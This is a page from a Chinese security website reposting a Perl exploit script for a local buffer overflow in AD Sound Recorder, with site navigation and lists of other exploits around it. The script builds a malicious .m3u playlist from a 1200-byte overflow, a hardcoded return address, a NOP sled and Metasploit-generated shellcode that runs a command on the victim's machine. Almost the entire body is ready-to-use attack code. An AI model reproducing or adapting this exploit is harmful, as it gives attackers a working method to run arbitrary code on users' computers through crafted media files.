首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AD Sound Recorder Local Buffer Overflow
来源:Angel-Injection@hotmail.com 作者:Angel 发布时间:2011-09-05  
#!/usr/bin/perl
# Exploit Title: AD Sound Recorder Local Buffer Overflow
# Author: Angel Injection
# Email: Angel-Injection@hotmail.com
# Facebook Page: https://www.facebook.com/groups/Inj3ct0r.Team/
# Facebook Profile: https://www.facebook.com/profile.php?id=100002832087346
# Home Page: http://1337day.com , http://sec-krb.org
# Greets To: Inj3ct0r Team On Facebook ^_^
##############################################################################

my $overflow = "\x41" x 1200;
my $ret = "\x5D\x38\x82\x7C";
my $nop = "\x90" x 10;

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08".
"\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7".
"\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb".
"\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f".
"\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".
"\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".
"\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".
"\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".
"\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".
"\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";

my $file="exploit.m3u";

$exploit = $overflow.$ret.$nop.$shellcode;

open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Bison FTP Server v3.5 Multiple
·Desktop Recorder Local Buffer
·XFtp_client Remote Buffer Over
·Free MP3 CD Ripper 1.1 Local B
·Sound Editor Local Buffer Over
·BisonFTP Server v3.5 (MKD) Rem
·CoolPlayer Portable 2.19.2 Buf
·Cerberus FTP Server 4.0.9.8 (R
·World Of Warcraft Local Stack
·Musiccut210p Local Buffer Over
·ZipX for Windows v1.71 ZIP Fil
·DragonflyBSD PortBind TCP (133
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved